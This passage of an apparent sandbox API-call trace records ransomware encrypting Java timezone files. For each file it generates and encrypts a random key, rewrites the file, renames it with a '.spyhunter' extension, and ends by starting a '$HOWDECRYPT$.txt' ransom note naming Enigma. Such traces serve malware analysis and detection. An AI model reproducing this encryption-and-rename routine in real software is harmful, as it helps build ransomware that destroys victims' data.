Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.769] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion.spyhunter") returned 70 [0171.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion.spyhunter")) returned 1 [0171.770] GetProcessHeap () returned 0x2c0000 [0171.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.770] GetProcessHeap () returned 0x2c0000 [0171.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.770] GetProcessHeap () returned 0x2c0000 [0171.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfba0 | out: hHeap=0x2c0000) returned 1 [0171.771] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e560 | out: pbBuffer=0x270e560) returned 1 [0171.771] GetProcessHeap () returned 0x2c0000 [0171.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.771] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e558*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e558*=0x30) returned 1 [0171.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.773] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos") returned 74 [0171.773] StrStrW (lpFirst="Rio_Gallegos", lpSrch=".txt") returned 0x0 [0171.773] GetProcessHeap () returned 0x2c0000 [0171.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.773] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e51c*=0x225, lpOverlapped=0x0) returned 1 [0171.773] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.774] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x270e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e51c*=0x225, lpOverlapped=0x0) returned 1 [0171.774] GetProcessHeap () returned 0x2c0000 [0171.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.774] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.774] WriteFile (in: hFile=0x178, lpBuffer=0x270e55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e51c, lpOverlapped=0x0 | out: lpBuffer=0x270e55c*, lpNumberOfBytesWritten=0x270e51c*=0x4, lpOverlapped=0x0) returned 1 [0171.774] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e51c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e51c*=0x30, lpOverlapped=0x0) returned 1 [0171.774] CloseHandle (hObject=0x178) returned 1 [0171.774] GetProcessHeap () returned 0x2c0000 [0171.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.774] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos.spyhunter") returned 84 [0171.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos.spyhunter")) returned 1 [0171.776] GetProcessHeap () returned 0x2c0000 [0171.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.776] GetProcessHeap () returned 0x2c0000 [0171.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.776] GetProcessHeap () returned 0x2c0000 [0171.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4ef0 | out: hHeap=0x2c0000) returned 1 [0171.776] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e560 | out: pbBuffer=0x270e560) returned 1 [0171.776] GetProcessHeap () returned 0x2c0000 [0171.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.776] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e558*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e558*=0x30) returned 1 [0171.776] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.777] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza") returned 69 [0171.777] StrStrW (lpFirst="Mendoza", lpSrch=".txt") returned 0x0 [0171.777] GetProcessHeap () returned 0x2c0000 [0171.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.777] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e51c*=0x225, lpOverlapped=0x0) returned 1 [0171.778] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.778] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x270e51c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e51c*=0x225, lpOverlapped=0x0) returned 1 [0171.778] GetProcessHeap () returned 0x2c0000 [0171.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.778] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.778] WriteFile (in: hFile=0x178, lpBuffer=0x270e55c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e51c, lpOverlapped=0x0 | out: lpBuffer=0x270e55c*, lpNumberOfBytesWritten=0x270e51c*=0x4, lpOverlapped=0x0) returned 1 [0171.779] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e51c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e51c*=0x30, lpOverlapped=0x0) returned 1 [0171.779] CloseHandle (hObject=0x178) returned 1 [0171.779] GetProcessHeap () returned 0x2c0000 [0171.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.779] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza.spyhunter") returned 79 [0171.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza.spyhunter")) returned 1 [0171.780] GetProcessHeap () returned 0x2c0000 [0171.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.780] GetProcessHeap () returned 0x2c0000 [0171.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.781] GetProcessHeap () returned 0x2c0000 [0171.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7cdb0 | out: hHeap=0x2c0000) returned 1 [0171.781] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e558 | out: pbBuffer=0x270e558) returned 1 [0171.781] GetProcessHeap () returned 0x2c0000 [0171.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.781] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e550*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e550*=0x30) returned 1 [0171.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.782] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja") returned 70 [0171.782] StrStrW (lpFirst="La_Rioja", lpSrch=".txt") returned 0x0 [0171.782] GetProcessHeap () returned 0x2c0000 [0171.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.782] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e514*=0x22d, lpOverlapped=0x0) returned 1 [0171.783] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.783] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0x270e514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e514*=0x22d, lpOverlapped=0x0) returned 1 [0171.783] GetProcessHeap () returned 0x2c0000 [0171.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.783] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.783] WriteFile (in: hFile=0x178, lpBuffer=0x270e554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e514, lpOverlapped=0x0 | out: lpBuffer=0x270e554*, lpNumberOfBytesWritten=0x270e514*=0x4, lpOverlapped=0x0) returned 1 [0171.783] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e514, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e514*=0x30, lpOverlapped=0x0) returned 1 [0171.783] CloseHandle (hObject=0x178) returned 1 [0171.783] GetProcessHeap () returned 0x2c0000 [0171.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.783] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja.spyhunter") returned 80 [0171.783] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja.spyhunter")) returned 1 [0171.785] GetProcessHeap () returned 0x2c0000 [0171.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.785] GetProcessHeap () returned 0x2c0000 [0171.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.785] GetProcessHeap () returned 0x2c0000 [0171.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d1e8 | out: hHeap=0x2c0000) returned 1 [0171.785] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e558 | out: pbBuffer=0x270e558) returned 1 [0171.785] GetProcessHeap () returned 0x2c0000 [0171.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.786] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e550*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e550*=0x30) returned 1 [0171.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.787] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy") returned 67 [0171.787] StrStrW (lpFirst="Jujuy", lpSrch=".txt") returned 0x0 [0171.787] GetProcessHeap () returned 0x2c0000 [0171.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.787] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e514*=0x215, lpOverlapped=0x0) returned 1 [0171.788] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.788] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x215, lpNumberOfBytesWritten=0x270e514, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e514*=0x215, lpOverlapped=0x0) returned 1 [0171.788] GetProcessHeap () returned 0x2c0000 [0171.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.788] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.788] WriteFile (in: hFile=0x178, lpBuffer=0x270e554*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e514, lpOverlapped=0x0 | out: lpBuffer=0x270e554*, lpNumberOfBytesWritten=0x270e514*=0x4, lpOverlapped=0x0) returned 1 [0171.788] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e514, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e514*=0x30, lpOverlapped=0x0) returned 1 [0171.788] CloseHandle (hObject=0x178) returned 1 [0171.788] GetProcessHeap () returned 0x2c0000 [0171.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.788] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy.spyhunter") returned 77 [0171.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy.spyhunter")) returned 1 [0171.789] GetProcessHeap () returned 0x2c0000 [0171.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.789] GetProcessHeap () returned 0x2c0000 [0171.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.789] GetProcessHeap () returned 0x2c0000 [0171.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03e98 | out: hHeap=0x2c0000) returned 1 [0171.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e550 | out: pbBuffer=0x270e550) returned 1 [0171.790] GetProcessHeap () returned 0x2c0000 [0171.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.790] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e548*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e548*=0x30) returned 1 [0171.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.790] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba") returned 69 [0171.790] StrStrW (lpFirst="Cordoba", lpSrch=".txt") returned 0x0 [0171.790] GetProcessHeap () returned 0x2c0000 [0171.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.790] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e50c*=0x225, lpOverlapped=0x0) returned 1 [0171.791] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.791] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x270e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e50c*=0x225, lpOverlapped=0x0) returned 1 [0171.791] GetProcessHeap () returned 0x2c0000 [0171.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.791] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.791] WriteFile (in: hFile=0x178, lpBuffer=0x270e54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e50c, lpOverlapped=0x0 | out: lpBuffer=0x270e54c*, lpNumberOfBytesWritten=0x270e50c*=0x4, lpOverlapped=0x0) returned 1 [0171.792] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e50c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e50c*=0x30, lpOverlapped=0x0) returned 1 [0171.792] CloseHandle (hObject=0x178) returned 1 [0171.792] GetProcessHeap () returned 0x2c0000 [0171.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.792] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba.spyhunter") returned 79 [0171.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba.spyhunter")) returned 1 [0171.793] GetProcessHeap () returned 0x2c0000 [0171.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.793] GetProcessHeap () returned 0x2c0000 [0171.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.793] GetProcessHeap () returned 0x2c0000 [0171.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d038 | out: hHeap=0x2c0000) returned 1 [0171.793] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e550 | out: pbBuffer=0x270e550) returned 1 [0171.794] GetProcessHeap () returned 0x2c0000 [0171.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.794] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e548*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e548*=0x30) returned 1 [0171.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.794] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca") returned 71 [0171.794] StrStrW (lpFirst="Catamarca", lpSrch=".txt") returned 0x0 [0171.794] GetProcessHeap () returned 0x2c0000 [0171.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.794] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e50c*=0x225, lpOverlapped=0x0) returned 1 [0171.795] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.795] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x270e50c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e50c*=0x225, lpOverlapped=0x0) returned 1 [0171.795] GetProcessHeap () returned 0x2c0000 [0171.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.795] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.796] WriteFile (in: hFile=0x178, lpBuffer=0x270e54c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e50c, lpOverlapped=0x0 | out: lpBuffer=0x270e54c*, lpNumberOfBytesWritten=0x270e50c*=0x4, lpOverlapped=0x0) returned 1 [0171.796] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e50c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e50c*=0x30, lpOverlapped=0x0) returned 1 [0171.796] CloseHandle (hObject=0x178) returned 1 [0171.796] GetProcessHeap () returned 0x2c0000 [0171.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.796] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca.spyhunter") returned 81 [0171.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca.spyhunter")) returned 1 [0171.820] GetProcessHeap () returned 0x2c0000 [0171.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.820] GetProcessHeap () returned 0x2c0000 [0171.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.820] GetProcessHeap () returned 0x2c0000 [0171.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d110 | out: hHeap=0x2c0000) returned 1 [0171.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.829] lstrlenA (lpString="All your files are encrypted by Enigma 